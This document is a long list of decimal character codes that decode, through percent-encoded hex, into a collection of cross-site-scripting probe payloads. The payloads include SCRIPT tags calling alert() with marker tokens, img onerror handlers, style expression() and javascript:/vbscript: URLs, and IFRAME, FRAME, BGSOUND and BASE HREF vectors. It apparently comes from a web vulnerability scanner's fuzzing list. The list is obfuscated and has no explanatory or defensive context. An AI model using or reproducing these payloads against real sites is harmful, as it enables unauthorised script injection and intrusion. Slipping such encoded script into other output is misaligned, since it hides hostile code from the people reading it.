1,57,37,54,49,37,51,57,37,51,54,37,51,57,37,51,5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50,37,51,101,37,51,99,37,53,51,37,52,51,37,53,50,37,52,57,37,53,48,37,53,52,37,51,101,37,54,49,37,54,99,37,54,53,37,55,50,37,55,52,37,50,56,37,50,55,37,54,49,37,51,49,37,51,49,37,51,57,37,51,53,37,54,54,37,51,54,37,51,53,37,54,53,37,51,57,37,51,55,37,54,54,37,54,52,37,54,51,37,51,57,37,54,52,37,54,51,37,51,56,37,51,56,37,51,48,37,51,57,37,54,50,37,51,50,37,51,50,37,51,48,37,51,57,37,54,49,37,51,51,37,51,57,37,54,51,37,54,54,37,51,54,37,50,55,37,50,57,37,51,99,37,50,102,37,53,51,37,52,51,37,53,50,37,52,57,37,53,48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55,37,50,55,37,51,98,37,50,49,37,50,100,37,50,100,37,50,50,37,51,99,37,51,51,37,51,54,37,54,50,37,54,54,37,51,56,37,51,52,37,51,50,37,51,53,37,54,52,37,51,56,37,51,55,37,51,49,37,51,56,37,51,48,37,51,56,37,51,57,37,51,51,37,54,49,37,51,55,37,51,54,37,51,48,37,51,49,37,51,50,37,51,50,37,51,56,37,54,53,37,54,49,37,54,51,37,51,57,37,51,48,37,51,52,37,51,50,37,51,101,37,51,100,37,50,54,37,55,98,37,50,56,37,50,57,37,55,100,37,50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0,102,37,53,52,37,52,57,37,53,52,37,52,99,37,52,53,37,51,101,37,51,53,37,54,53,37,51,48,37,54,50,37,51,50,37,54,54,37,51,55,37,51,54,37,54,50,37,51,52,37,54,53,37,54,51,37,51,55,37,51,53,37,54,50,37,54,52,37,51,55,37,54,53,37,51,52,37,54,49,37,51,49,37,51,55,37,54,50,37,51,53,37,51,56,37,54,54,37,51,51,37,51,52,37,51,49,37,54,54,37,51,51,37,51,4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50,37,51,101,37,51,99,37,54,57,37,54,100,37,54,55,37,50,48,37,55,51,37,55,50,37,54,51,37,51,100,37,50,50,37,55,56,37,51,97,37,55,56,37,50,50,37,50,48,37,54,102,37,54,101,37,54,53,37,55,50,37,55,50,37,54,102,37,55,50,37,51,100,37,50,50,37,51,55,37,51,48,37,51,56,37,51,54,37,51,55,37,54,50,37,54,49,37,51,55,37,54,54,37,54,51,37,54,49,37,51,54,37,51,52,37,51,49,37,51,55,37,54,49,37,54,50,37,54,52,37,51,57,37,51,53,37,51,54,37,51,50,37,51,48,37,51,57,37,54,49,37,54,51,37,51,54,37,51,53,37,54,54,37,51,51,37,51,53,37,51,50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0,37,52,102,37,52,52,37,53,57,37,50,48,37,54,102,37,54,101,37,54,99,37,54,102,37,54,49,37,54,52,37,50,49,37,50,51,37,50,52,37,50,53,37,50,54,37,50,56,37,50,57,37,50,97,37,55,101,37,50,98,37,50,100,37,53,102,37,50,101,37,50,99,37,51,97,37,51,98,37,51,102,37,52,48,37,53,98,37,50,102,37,55,99,37,53,99,37,53,100,37,53,101,37,54,48,37,51,100,37,51,52,37,54,50,37,51,55,37,51,48,37,54,54,37,51,50,37,51,49,37,51,55,37,54,52,37,54,49,37,51,53,37,51,49,37,51,50,37,54,51,37,51,48,37,51,51,37,54,50,37,54,49,37,54,50,37,51,52,37,54,53,37,51,51,37,51,50,37,51,52,37,54,52,37,51,52,37,51,52,37,51,55,37,51,56,37,51,55,37,54,53,37,54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55,37,50,55,37,51,98,37,50,49,37,50,100,37,50,100,37,50,50,37,51,99,37,54,50,37,54,54,37,54,53,37,51,49,37,51,49,37,51,54,37,51,54,37,54,52,37,54,51,37,51,54,37,51,52,37,51,48,37,51,57,37,54,50,37,51,49,37,51,51,37,51,52,37,51,54,37,51,50,37,51,49,37,51,55,37,54,51,37,54,53,37,54,52,37,54,49,37,51,51,37,54,53,37,54,49,37,51,56,37,54,50,37,51,53,37,51,55,37,51,101,37,51,100,37,50,54,37,55,98,37,50,56,37,50,57,37,55,100,37,50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0,50,37,54,53,37,51,54,37,51,49,37,54,54,37,51,53,37,51,51,37,51,49,37,51,56,37,51,50,37,51,49,37,54,53,37,51,50,37,54,52,37,51,51,37,54,52,37,51,53,37,51,51,37,51,53,37,54,54,37,51,55,37,54,53,37,54,53,37,54,54,37,54,50,37,54,51,37,51,49,37,54,53,37,51,51,37,54,50,37,51,48,37,54,52,37,51,49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4,50,37,54,50,37,51,49,37,54,52,37,54,54,37,54,50,37,51,56,37,54,51,37,54,51,37,54,49,37,54,49,37,54,50,37,51,50,37,51,56,37,51,52,37,54,52,37,54,53,37,54,49,37,51,52,37,51,48,37,54,50,37,51,54,37,51,56,37,54,54,37,54,50,37,51,51,37,51,54,37,51,57,37,54,51,37,54,49,37,51,53,37,54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4,48,37,54,54,37,54,53,37,54,53,37,54,54,37,51,50,37,51,49,37,51,57,37,51,49,37,54,50,37,51,50,37,51,53,37,51,50,37,51,49,37,51,55,37,54,51,37,54,54,37,51,55,37,54,50,37,54,52,37,54,52,37,54,52,37,51,50,37,51,48,37,51,56,37,51,57,37,51,50,37,51,56,37,51,50,37,54,54,37,54,50,37,51,51,37,51,56,37,54,48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0,50,37,50,50,37,50,50,37,51,101,37,51,52,37,54,50,37,54,51,37,54,54,37,51,48,37,51,56,37,51,49,37,54,49,37,51,54,37,51,52,37,54,53,37,51,49,37,51,50,37,54,51,37,51,49,37,51,57,37,54,51,37,51,53,37,51,50,37,51,48,37,54,51,37,51,50,37,54,51,37,51,49,37,51,54,37,54,50,37,51,56,37,54,52,37,51,50,37,54,51,37,51,49,37,51,54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0,50,37,50,48,37,50,54,37,50,51,37,51,49,37,51,52,37,51,98,37,50,48,37,50,48,37,54,52,37,51,50,37,51,54,37,51,50,37,51,57,37,51,53,37,51,55,37,54,51,37,51,52,37,51,48,37,54,53,37,51,54,37,51,50,37,51,52,37,51,51,37,51,56,37,54,53,37,54,51,37,51,56,37,51,48,37,51,56,37,54,50,37,51,50,37,51,51,37,54,52,37,51,48,37,51,56,37,54,51,37,51,56,37,51,57,37,54,51,37,51,52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2,37,52,57,37,53,54,37,50,48,37,53,51,37,53,52,37,53,57,37,52,99,37,52,53,37,51,100,37,50,50,37,54,50,37,54,53,37,54,56,37,54,49,37,55,54,37,54,57,37,54,102,37,55,53,37,55,50,37,51,97,37,50,48,37,55,53,37,55,50,37,54,99,37,50,56,37,51,56,37,54,49,37,54,54,37,51,53,37,51,53,37,51,50,37,54,49,37,51,48,37,54,51,37,51,51,37,54,53,37,51,51,37,51,51,37,54,54,37,51,56,37,54,49,37,51,57,37,54,54,37,51,48,37,54,50,37,51,50,37,54,51,37,51,57,37,51,49,37,54,52,37,51,48,37,54,54,37,54,54,37,51,57,37,51,56,37,51,56,37,54,50,37,50,57,37,51,98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1,99,37,53,51,37,52,51,37,53,50,37,52,57,37,53,48,37,53,52,37,51,101,37,51,52,37,51,55,37,54,50,37,54,51,37,51,51,37,51,51,37,54,51,37,51,50,37,51,55,37,51,54,37,51,51,37,51,56,37,51,52,37,51,52,37,51,49,37,51,55,37,51,52,37,51,50,37,51,49,37,51,52,37,54,49,37,51,57,37,51,54,37,51,52,37,54,50,37,51,49,37,54,50,37,51,51,37,51,53,37,54,53,37,54,51,37,51,55,37,50,102,37,50,102,37,51,99,37,51,99,37,50,102,37,53,51,37,52,51,37,53,50,37,52,57,37,53,48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50,37,51,98,37,54,52,37,51,51,37,51,49,37,51,54,37,51,49,37,54,53,37,51,54,37,54,49,37,54,52,37,51,50,37,54,49,37,51,51,37,54,49,37,54,49,37,54,49,37,54,51,37,51,50,37,51,52,37,54,53,37,51,48,37,54,54,37,54,54,37,51,51,37,51,56,37,54,52,37,54,54,37,54,49,37,54,54,37,54,53,37,54,50,37,54,52,37,54,52,37,50,102,37,50,10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0,55,37,54,49,37,51,56,37,51,57,37,51,54,37,54,53,37,54,50,37,54,52,37,51,54,37,54,53,37,51,48,37,51,57,37,51,54,37,54,51,37,54,50,37,51,56,37,51,49,37,54,49,37,51,57,37,51,56,37,51,50,37,51,51,37,54,52,37,51,56,37,51,57,37,51,52,37,51,48,37,51,54,37,54,49,37,54,51,37,51,54,37,51,51,37,51,55,37,50,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0,37,52,102,37,52,52,37,53,57,37,50,48,37,52,50,37,52,49,37,52,51,37,52,98,37,52,55,37,53,50,37,52,102,37,53,53,37,52,101,37,52,52,37,51,100,37,50,50,37,54,52,37,51,53,37,54,49,37,54,49,37,54,50,37,54,50,37,54,50,37,51,57,37,54,52,37,51,52,37,51,55,37,54,54,37,51,55,37,54,50,37,51,56,37,51,53,37,54,52,37,51,53,37,54,50,37,51,56,37,51,51,37,51,56,37,51,53,37,54,54,37,51,53,37,51,55,37,51,56,37,54,51,37,51,57,37,54,54,37,51,54,37,54,54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1,37,53,48,37,53,53,37,53,52,37,50,48,37,53,52,37,53,57,37,53,48,37,52,53,37,51,100,37,50,50,37,52,57,37,52,100,37,52,49,37,52,55,37,52,53,37,50,50,37,50,48,37,53,51,37,53,50,37,52,51,37,51,100,37,50,50,37,51,56,37,54,51,37,54,54,37,54,52,37,51,53,37,51,55,37,51,48,37,54,51,37,51,48,37,54,54,37,51,49,37,51,51,37,54,52,37,51,56,37,51,48,37,54,51,37,54,52,37,54,53,37,51,57,37,51,57,37,51,48,37,51,53,37,51,56,37,51,51,37,51,55,37,51,52,37,54,50,37,54,50,37,51,49,37,51,52,37,51,49,37,51,51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0,37,52,102,37,52,52,37,53,57,37,50,48,37,52,102,37,52,101,37,52,99,37,52,102,37,52,49,37,52,52,37,51,100,37,54,49,37,51,54,37,51,48,37,51,48,37,51,51,37,51,50,37,54,51,37,54,50,37,51,56,37,51,49,37,51,57,37,51,50,37,51,53,37,54,49,37,51,57,37,54,49,37,54,52,37,54,50,37,51,52,37,54,53,37,54,49,37,51,48,37,54,53,37,51,55,37,51,57,37,54,54,37,51,57,37,54,51,37,54,49,37,51,50,37,54,53,37,54,54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2,52,37,53,57,37,52,101,37,53,51,37,53,50,37,52,51,37,51,100,37,50,50,37,54,53,37,51,52,37,54,54,37,51,54,37,54,49,37,51,56,37,54,49,37,51,55,37,51,54,37,51,53,37,51,52,37,54,49,37,54,51,37,54,51,37,54,51,37,51,54,37,54,54,37,51,56,37,54,50,37,51,55,37,54,49,37,51,51,37,51,48,37,54,51,37,54,51,37,51,51,37,51,49,37,54,51,37,51,48,37,54,52,37,51,57,37,54,53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2,99,37,52,102,37,53,55,37,53,51,37,53,50,37,52,51,37,51,100,37,50,50,37,51,57,37,51,52,37,51,50,37,51,49,37,54,53,37,54,52,37,51,54,37,51,54,37,51,57,37,51,49,37,54,54,37,54,49,37,54,51,37,51,49,37,51,55,37,54,53,37,54,54,37,51,53,37,51,54,37,54,50,37,54,53,37,51,55,37,51,53,37,51,53,37,54,53,37,54,52,37,51,48,37,54,49,37,51,50,37,51,51,37,51,57,37,51,55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0,37,52,55,37,53,51,37,52,102,37,53,53,37,52,101,37,52,52,37,50,48,37,53,51,37,53,50,37,52,51,37,51,100,37,50,50,37,54,53,37,51,54,37,54,54,37,51,50,37,51,52,37,51,57,37,51,51,37,54,50,37,51,56,37,51,49,37,54,54,37,54,52,37,54,53,37,51,52,37,51,54,37,51,52,37,54,51,37,54,54,37,51,51,37,54,52,37,51,49,37,54,51,37,51,54,37,54,49,37,51,52,37,54,49,37,54,51,37,51,56,37,51,48,37,54,53,37,51,48,37,51,53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0,37,53,50,37,50,48,37,53,51,37,52,57,37,53,97,37,52,53,37,51,100,37,50,50,37,50,54,37,55,98,37,54,49,37,51,55,37,51,48,37,54,53,37,54,51,37,51,49,37,51,50,37,51,51,37,54,49,37,51,53,37,54,50,37,54,50,37,51,51,37,51,49,37,51,54,37,54,53,37,51,54,37,54,49,37,51,54,37,51,51,37,51,50,37,54,54,37,51,49,37,51,48,37,51,48,37,54,54,37,54,50,37,51,54,37,54,51,37,51,49,37,51,49,37,51,53,37,55,100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99,37,52,57,37,52,101,37,52,98,37,50,48,37,53,50,37,52,53,37,52,99,37,51,100,37,50,50,37,55,51,37,55,52,37,55,57,37,54,99,37,54,53,37,55,51,37,54,56,37,54,53,37,54,53,37,55,52,37,50,50,37,50,48,37,52,56,37,53,50,37,52,53,37,52,54,37,51,100,37,50,50,37,51,57,37,54,52,37,51,48,37,51,54,37,54,49,37,54,54,37,51,56,37,54,51,37,54,52,37,51,54,37,54,53,37,51,48,37,51,48,37,54,52,37,54,53,37,54,50,37,54,54,37,51,48,37,51,55,37,51,49,37,51,50,37,54,54,37,51,52,37,51,56,37,51,56,37,51,52,37,51,52,37,51,48,37,51,52,37,51,53,37,54,50,37,51,52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0,55,37,55,54,37,54,50,37,55,51,37,54,51,37,55,50,37,54,57,37,55,48,37,55,52,37,51,97,37,54,52,37,51,50,37,54,54,37,51,50,37,54,50,37,51,53,37,54,50,37,51,49,37,51,54,37,51,57,37,54,49,37,54,54,37,51,53,37,51,57,37,51,53,37,51,50,37,51,51,37,54,49,37,51,52,37,51,52,37,51,53,37,54,51,37,51,53,37,51,52,37,51,53,37,54,52,37,51,49,37,54,49,37,51,49,37,51,55,37,54,51,37,54,53,37,50,55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0,50,37,54,100,37,54,102,37,54,51,37,54,56,37,54,49,37,51,97,37,53,98,37,54,52,37,51,50,37,54,52,37,51,50,37,54,50,37,54,54,37,51,55,37,54,54,37,51,54,37,54,49,37,54,53,37,51,48,37,51,51,37,54,49,37,54,54,37,54,53,37,51,54,37,51,55,37,51,49,37,54,49,37,51,53,37,51,55,37,51,57,37,54,53,37,54,52,37,51,55,37,54,53,37,51,51,37,51,57,37,51,56,37,51,55,37,51,50,37,53,100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0,50,37,54,99,37,54,57,37,55,54,37,54,53,37,55,51,37,54,51,37,55,50,37,54,57,37,55,48,37,55,52,37,51,97,37,53,98,37,51,49,37,51,57,37,51,56,37,54,53,37,51,50,37,54,53,37,51,48,37,54,49,37,54,53,37,51,52,37,51,55,37,51,50,37,51,51,37,54,49,37,51,55,37,51,53,37,54,54,37,51,54,37,54,51,37,54,52,37,51,53,37,51,56,37,51,48,37,54,49,37,54,51,37,51,50,37,51,52,37,54,53,37,54,54,37,51,52,37,51,56,37,54,50,37,53,100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100,37,52,53,37,53,52,37,52,49,37,50,48,37,52,56,37,53,52,37,53,52,37,53,48,37,50,100,37,52,53,37,53,49,37,53,53,37,52,57,37,53,54,37,51,100,37,50,50,37,55,50,37,54,53,37,54,54,37,55,50,37,54,53,37,55,51,37,54,56,37,50,50,37,50,48,37,52,51,37,52,102,37,52,101,37,53,52,37,52,53,37,52,101,37,53,52,37,51,100,37,50,50,37,51,48,37,51,98,37,55,53,37,55,50,37,54,99,37,51,100,37,54,50,37,51,52,37,51,50,37,54,51,37,54,50,37,54,49,37,51,56,37,51,49,37,54,50,37,51,50,37,51,57,37,51,55,37,54,52,37,54,54,37,51,49,37,54,49,37,54,54,37,51,48,37,51,49,37,51,50,37,51,50,37,51,53,37,54,52,37,51,51,37,51,52,37,51,54,37,51,55,37,54,51,37,54,49,37,54,53,37,54,52,37,54,51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2,37,52,49,37,52,50,37,52,99,37,52,53,37,50,48,37,52,50,37,52,49,37,52,51,37,52,98,37,52,55,37,53,50,37,52,102,37,53,53,37,52,101,37,52,52,37,51,100,37,50,50,37,51,56,37,51,54,37,54,50,37,51,53,37,54,54,37,51,57,37,54,49,37,51,52,37,51,57,37,54,53,37,51,55,37,54,54,37,51,52,37,51,50,37,51,55,37,54,54,37,54,53,37,51,50,37,51,53,37,54,51,37,51,56,37,51,55,37,51,57,37,51,54,37,54,49,37,54,53,37,54,50,37,54,49,37,51,57,37,54,54,37,51,55,37,51,56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2,37,52,49,37,52,50,37,52,99,37,52,53,37,50,48,37,52,50,37,52,49,37,52,51,37,52,98,37,52,55,37,53,50,37,52,102,37,53,53,37,52,101,37,52,52,37,51,100,37,54,97,37,54,49,37,55,54,37,54,49,37,55,51,37,54,51,37,55,50,37,54,57,37,55,48,37,55,52,37,51,97,37,51,50,37,51,53,37,51,49,37,51,55,37,54,51,37,51,54,37,51,56,37,54,51,37,54,50,37,51,52,37,54,51,37,54,51,37,54,53,37,54,49,37,54,54,37,51,54,37,54,49,37,51,49,37,51,52,37,51,54,37,51,54,37,54,50,37,51,52,37,54,50,37,51,48,37,54,50,37,54,53,37,51,49,37,51,52,37,51,55,37,54,54,37,51,48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2,37,52,49,37,52,50,37,52,99,37,52,53,37,51,101,37,51,99,37,53,52,37,52,52,37,50,48,37,52,50,37,52,49,37,52,51,37,52,98,37,52,55,37,53,50,37,52,102,37,53,53,37,52,101,37,52,52,37,51,100,37,50,50,37,54,54,37,54,52,37,51,56,37,51,50,37,54,50,37,54,51,37,51,48,37,51,49,37,54,50,37,54,52,37,54,52,37,51,54,37,54,54,37,51,56,37,54,53,37,54,54,37,54,49,37,51,55,37,51,54,37,51,48,37,54,50,37,54,49,37,54,53,37,51,54,37,51,50,37,51,56,37,54,54,37,51,53,37,54,50,37,51,50,37,54,50,37,51,52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2,37,52,57,37,53,54,37,50,48,37,53,51,37,53,52,37,53,57,37,52,99,37,52,53,37,51,100,37,50,50,37,54,50,37,54,49,37,54,51,37,54,98,37,54,55,37,55,50,37,54,102,37,55,53,37,54,101,37,54,52,37,50,100,37,54,57,37,54,100,37,54,49,37,54,55,37,54,53,37,51,97,37,50,48,37,55,53,37,55,50,37,54,99,37,50,56,37,51,52,37,54,52,37,51,53,37,51,54,37,51,56,37,54,49,37,54,53,37,51,48,37,54,50,37,51,48,37,51,56,37,51,56,37,51,53,37,54,49,37,54,50,37,51,48,37,51,53,37,51,57,37,51,51,37,51,50,37,51,54,37,51,49,37,51,56,37,51,51,37,51,49,37,54,54,37,51,49,37,51,52,37,51,56,37,51,49,37,51,53,37,54,53,37,50,57,37,51,98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2,37,52,57,37,53,54,37,50,48,37,53,51,37,53,52,37,53,57,37,52,99,37,52,53,37,51,100,37,50,50,37,55,55,37,54,57,37,54,52,37,55,52,37,54,56,37,51,97,37,50,48,37,54,53,37,55,56,37,55,48,37,55,50,37,54,53,37,55,51,37,55,51,37,54,57,37,54,102,37,54,101,37,50,56,37,51,50,37,54,54,37,51,48,37,51,48,37,51,48,37,51,48,37,51,48,37,51,57,37,51,56,37,51,56,37,54,49,37,54,49,37,51,56,37,51,57,37,54,49,37,54,53,37,54,51,37,51,49,37,54,53,37,51,50,37,54,52,37,51,56,37,51,56,37,51,49,37,51,53,37,54,52,37,51,55,37,51,51,37,51,48,37,54,51,37,54,53,37,51,56,37,50,57,37,51,98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54,37,53,50,37,52,49,37,52,100,37,52,53,37,50,48,37,53,51,37,53,50,37,52,51,37,51,100,37,50,50,37,54,50,37,54,54,37,54,49,37,51,57,37,51,57,37,54,50,37,54,54,37,51,57,37,51,49,37,51,53,37,54,51,37,54,51,37,54,54,37,51,48,37,51,51,37,51,51,37,51,56,37,51,57,37,54,53,37,51,49,37,51,53,37,54,53,37,54,50,37,51,56,37,51,52,37,51,53,37,51,57,37,54,53,37,51,49,37,54,51,37,51,55,37,51,53,37,50,50,37,51,101,37,51,99,37,50,102,37,52,57,37,52,54,37,53,50,37,52,49,37,52,100,37,52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54,37,55,50,37,54,49,37,54,100,37,54,53,37,50,102,37,50,48,37,50,102,37,54,102,37,54,101,37,54,99,37,54,102,37,54,49,37,54,52,37,51,100,37,51,51,37,51,48,37,51,49,37,54,53,37,54,53,37,54,51,37,51,52,37,54,53,37,51,54,37,54,50,37,54,53,37,54,49,37,51,57,37,51,52,37,51,57,37,51,49,37,51,55,37,51,51,37,51,54,37,54,50,37,51,51,37,51,52,37,51,56,37,54,54,37,54,53,37,51,52,37,51,56,37,51,56,37,51,57,37,54,53,37,54,51,37,51,53,37,51,101,37,51,99,37,50,102,37,54,57,37,54,54,37,55,50,37,54,49,37,54,100,37,54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54,37,55,50,37,54,49,37,54,100,37,54,53,37,50,102,37,50,48,37,50,50,37,54,102,37,54,101,37,54,99,37,54,102,37,54,49,37,54,52,37,51,100,37,51,51,37,51,49,37,54,50,37,54,51,37,51,57,37,54,52,37,54,50,37,54,51,37,54,54,37,54,50,37,51,51,37,54,50,37,54,50,37,51,55,37,54,49,37,54,49,37,51,48,37,51,56,37,51,55,37,51,55,37,51,51,37,54,51,37,54,54,37,51,56,37,51,55,37,51,50,37,54,51,37,51,48,37,51,55,37,51,54,37,51,51,37,54,54,37,51,101,37,51,99,37,50,102,37,54,57,37,54,54,37,55,50,37,54,49,37,54,100,37,54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54,37,55,50,37,54,49,37,54,100,37,54,53,37,50,102,37,50,102,37,50,102,37,50,102,37,50,102,37,50,102,37,50,102,37,54,102,37,54,101,37,54,99,37,54,102,37,54,49,37,54,52,37,51,100,37,54,54,37,54,52,37,51,55,37,51,54,37,51,55,37,51,51,37,54,52,37,51,50,37,51,56,37,51,57,37,54,50,37,54,51,37,51,56,37,51,51,37,54,53,37,51,48,37,54,53,37,51,50,37,51,57,37,51,55,37,54,51,37,54,52,37,54,50,37,54,53,37,51,51,37,54,50,37,51,49,37,51,53,37,51,51,37,54,52,37,51,53,37,51,53,37,51,101,37,51,99,37,50,102,37,54,57,37,54,54,37,55,50,37,54,49,37,54,100,37,54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54,37,55,50,37,54,49,37,54,100,37,54,53,37,50,48,37,50,50,37,54,102,37,54,101,37,54,99,37,54,102,37,54,49,37,54,52,37,51,100,37,51,52,37,51,50,37,51,55,37,51,57,37,51,48,37,51,56,37,54,54,37,54,51,37,51,48,37,51,48,37,51,48,37,54,53,37,54,54,37,51,55,37,51,51,37,51,50,37,54,54,37,54,53,37,51,56,37,51,52,37,54,52,37,54,49,37,51,53,37,54,53,37,51,57,37,51,51,37,54,54,37,54,49,37,54,49,37,51,52,37,51,51,37,51,49,37,51,101,37,51,99,37,50,102,37,54,57,37,54,54,37,55,50,37,54,49,37,54,100,37,54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54,37,55,50,37,54,49,37,54,100,37,54,53,37,50,102,37,50,48,37,50,50,37,54,102,37,54,101,37,54,99,37,54,102,37,54,49,37,54,52,37,51,100,37,51,56,37,54,51,37,51,49,37,51,50,37,51,48,37,51,54,37,54,51,37,51,48,37,51,55,37,54,49,37,51,48,37,51,53,37,54,54,37,54,50,37,51,48,37,54,49,37,51,52,37,51,52,37,54,50,37,54,49,37,54,52,37,54,49,37,51,48,37,51,52,37,51,57,37,51,49,37,54,50,37,51,55,37,51,50,37,54,51,37,51,52,37,54,49,37,51,101,37,51,99,37,50,102,37,54,57,37,54,54,37,55,50,37,54,49,37,54,100,37,54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54,37,55,50,37,54,49,37,54,100,37,54,53,37,51,99,37,51,102,37,55,48,37,54,56,37,55,48,37,50,48,37,54,53,37,54,51,37,54,56,37,54,102,37,50,48,37,54,51,37,54,56,37,55,50,37,50,56,37,51,49,37,51,49,37,50,57,37,51,102,37,51,101,37,50,48,37,54,102,37,54,101,37,54,99,37,54,102,37,54,49,37,54,52,37,51,100,37,51,56,37,54,49,37,51,48,37,54,54,37,51,52,37,51,53,37,51,55,37,54,51,37,54,53,37,51,54,37,51,54,37,54,51,37,51,50,37,51,48,37,51,48,37,51,55,37,51,57,37,51,48,37,54,53,37,54,51,37,51,49,37,54,50,37,54,52,37,54,52,37,51,48,37,51,57,37,51,51,37,51,56,37,54,50,37,51,51,37,54,54,37,51,56,37,51,101,37,51,99,37,50,102,37,54,57,37,54,54,37,55,50,37,54,49,37,54,100,37,54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54,37,55,50,37,54,49,37,54,100,37,54,53,37,51,99,37,51,102,37,55,48,37,54,56,37,55,48,37,50,48,37,54,53,37,54,51,37,54,56,37,54,102,37,50,48,37,54,51,37,54,56,37,55,50,37,50,56,37,51,49,37,51,50,37,50,57,37,51,102,37,51,101,37,50,48,37,54,102,37,54,101,37,54,99,37,54,102,37,54,49,37,54,52,37,51,100,37,51,52,37,54,54,37,51,53,37,54,54,37,51,55,37,54,51,37,54,52,37,54,50,37,54,52,37,51,51,37,51,50,37,51,53,37,51,55,37,51,53,37,51,52,37,51,53,37,54,52,37,54,53,37,51,49,37,51,52,37,54,53,37,51,48,37,51,54,37,51,48,37,51,51,37,51,57,37,54,53,37,51,53,37,51,51,37,51,50,37,54,49,37,51,52,37,51,101,37,51,99,37,50,102,37,54,57,37,54,54,37,55,50,37,54,49,37,54,100,37,54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4,37,53,50,37,52,49,37,52,100,37,52,53,37,53,51,37,52,53,37,53,52,37,51,101,37,51,99,37,52,54,37,53,50,37,52,49,37,52,100,37,52,53,37,50,48,37,53,51,37,53,50,37,52,51,37,51,100,37,50,50,37,54,53,37,51,48,37,51,50,37,51,49,37,54,51,37,54,52,37,54,49,37,51,54,37,51,51,37,51,49,37,54,49,37,51,54,37,54,54,37,54,54,37,51,53,37,51,55,37,54,49,37,51,54,37,54,49,37,54,53,37,54,50,37,51,51,37,51,49,37,51,51,37,54,54,37,54,53,37,51,55,37,51,56,37,54,49,37,54,51,37,54,49,37,54,52,37,50,50,37,51,101,37,51,99,37,50,102,37,52,54,37,53,50,37,52,49,37,52,100,37,52,53,37,53,51,37,52,53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2,37,52,49,37,52,50,37,52,99,37,52,53,37,50,48,37,52,50,37,52,49,37,52,51,37,52,98,37,52,55,37,53,50,37,52,102,37,53,53,37,52,101,37,52,52,37,51,100,37,50,50,37,51,51,37,51,51,37,51,52,37,54,50,37,54,54,37,54,52,37,51,56,37,51,51,37,51,49,37,51,48,37,51,55,37,51,53,37,51,51,37,51,52,37,51,53,37,51,49,37,54,49,37,51,55,37,54,50,37,51,53,37,51,50,37,51,50,37,51,54,37,54,54,37,54,49,37,51,55,37,54,49,37,51,55,37,54,53,37,51,56,37,51,55,37,51,52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2,37,52,49,37,52,50,37,52,99,37,52,53,37,51,101,37,51,99,37,53,52,37,52,52,37,50,48,37,52,50,37,52,49,37,52,51,37,52,98,37,52,55,37,53,50,37,52,102,37,53,53,37,52,101,37,52,52,37,51,100,37,50,50,37,51,48,37,51,49,37,51,48,37,54,50,37,51,48,37,54,49,37,51,55,37,54,54,37,51,52,37,54,49,37,51,55,37,51,54,37,51,53,37,51,57,37,51,57,37,51,54,37,51,51,37,51,56,37,54,54,37,54,49,37,54,52,37,54,53,37,51,53,37,51,50,37,51,57,37,51,50,37,54,49,37,51,50,37,51,50,37,51,48,37,51,56,37,51,54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2,37,52,57,37,53,54,37,50,48,37,53,51,37,53,52,37,53,57,37,52,99,37,52,53,37,51,100,37,50,50,37,54,50,37,54,49,37,54,51,37,54,98,37,54,55,37,55,50,37,54,102,37,55,53,37,54,101,37,54,52,37,50,100,37,54,57,37,54,100,37,54,49,37,54,55,37,54,53,37,51,97,37,50,48,37,55,53,37,55,50,37,54,99,37,50,56,37,50,54,37,50,51,37,51,49,37,51,98,37,54,49,37,51,53,37,51,56,37,54,52,37,51,57,37,54,54,37,51,53,37,51,52,37,51,50,37,54,50,37,54,52,37,51,56,37,54,52,37,51,49,37,51,49,37,51,48,37,51,56,37,54,53,37,51,55,37,54,49,37,54,53,37,51,56,37,51,53,37,54,52,37,51,53,37,51,54,37,51,57,37,51,49,37,51,57,37,51,52,37,51,56,37,51,49,37,50,57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2,37,52,57,37,53,54,37,50,48,37,53,51,37,53,52,37,53,57,37,52,99,37,52,53,37,51,100,37,50,50,37,55,55,37,54,57,37,54,52,37,55,52,37,54,56,37,51,97,37,50,48,37,54,53,37,55,56,37,55,48,37,55,50,37,54,53,37,55,51,37,55,51,37,54,57,37,54,102,37,54,101,37,50,56,37,51,52,37,54,51,37,51,55,37,54,53,37,54,52,37,54,49,37,54,51,37,51,54,37,51,48,37,54,49,37,51,53,37,51,48,37,54,53,37,54,51,37,51,48,37,51,51,37,51,53,37,51,51,37,54,54,37,51,50,37,51,49,37,54,52,37,54,53,37,54,50,37,51,57,37,54,51,37,54,51,37,51,51,37,51,56,37,51,55,37,51,54,37,54,50,37,50,57,37,51,98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2,37,53,57,37,52,99,37,52,53,37,51,100,37,50,50,37,55,56,37,55,51,37,55,51,37,51,97,37,54,53,37,55,56,37,55,48,37,55,50,37,50,102,37,50,97,37,51,51,37,51,51,37,54,49,37,54,51,37,54,54,37,51,56,37,51,49,37,54,53,37,54,51,37,54,50,37,51,54,37,51,52,37,51,53,37,54,53,37,51,52,37,54,52,37,51,56,37,51,53,37,54,49,37,54,49,37,51,57,37,54,54,37,54,52,37,54,53,37,51,52,37,54,50,37,51,52,37,54,51,37,51,52,37,51,50,37,51,54,37,51,52,37,50,97,37,50,102,37,54,53,37,55,51,37,55,51,37,54,57,37,54,102,37,54,101,37,50,56,37,51,51,37,51,51,37,54,49,37,54,51,37,54,54,37,51,56,37,51,49,37,54,53,37,54,51,37,54,50,37,51,54,37,51,52,37,51,53,37,54,53,37,51,52,37,54,52,37,51,56,37,51,53,37,54,49,37,54,49,37,51,57,37,54,54,37,54,52,37,54,53,37,51,52,37,54,50,37,51,52,37,54,51,37,51,52,37,51,50,37,51,54,37,51,52,37,50,57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1,53,37,51,49,37,54,51,37,51,50,37,54,50,37,51,50,37,54,54,37,54,51,37,51,55,37,54,53,37,51,57,37,51,52,37,51,53,37,51,49,37,54,49,37,51,53,37,51,57,37,51,53,37,54,52,37,51,55,37,54,52,37,51,49,37,51,52,37,54,53,37,51,51,37,51,49,37,51,50,37,54,49,37,54,54,37,54,54,37,51,52,37,54,53,37,50,48,37,53,51,37,53,52,37,53,57,37,52,99,37,52,53,37,51,100,37,50,50,37,55,56,37,55,51,37,55,51,37,51,97,37,54,53,37,55,56,37,55,48,37,55,50,37,54,53,37,55,51,37,55,51,37,54,57,37,54,102,37,54,101,37,50,56,37,51,53,37,51,49,37,54,51,37,51,50,37,54,50,37,51,50,37,54,54,37,54,51,37,51,55,37,54,53,37,51,57,37,51,52,37,51,53,37,51,49,37,54,49,37,51,53,37,51,57,37,51,53,37,54,52,37,51,55,37,54,52,37,51,49,37,51,52,37,54,53,37,51,51,37,51,49,37,51,50,37,54,49,37,54,54,37,54,54,37,51,52,37,54,53,37,50,57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1,37,53,52,37,53,57,37,52,99,37,52,53,37,50,48,37,53,52,37,53,57,37,53,48,37,52,53,37,51,100,37,50,50,37,55,5